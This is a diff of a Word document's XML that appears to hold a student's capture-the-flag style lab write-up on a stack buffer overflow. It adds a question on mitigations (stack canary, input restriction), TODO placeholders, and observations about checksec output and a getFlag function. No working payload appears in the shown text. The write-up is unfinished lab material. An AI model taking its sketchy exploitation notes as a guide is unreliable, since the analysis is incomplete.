+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6394,7 +6722,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5685BD68" wp14:editId="36AEA77B">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="736A2436" wp14:editId="49FC2AD8">
             <wp:extent cx="5972810" cy="1275715"/>
             <wp:effectExtent l="0" t="0" r="8890" b="635"/>
             <wp:docPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
@@ -6545,209 +6873,356 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Additional Questions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>What sort of mitigation technique is used here? How could you prevent this attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Stack canary</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>The canary is a -----. On Linux, it is often represented as a quite random-looking value that ends in 00.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>To prevent this attack, the program should be more restrictive on what types of input the user is permitted to send. This involves both the size and the contents of the user input, so that the buffer cannot be overflowed and malicious commands inserted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>TODO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>TODO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -6763,6 +7238,714 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Observations: Disassembly</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>checksec ./03 shows canary present</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Observations: Source Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is responsible for surrendering the flag.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A long variable </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
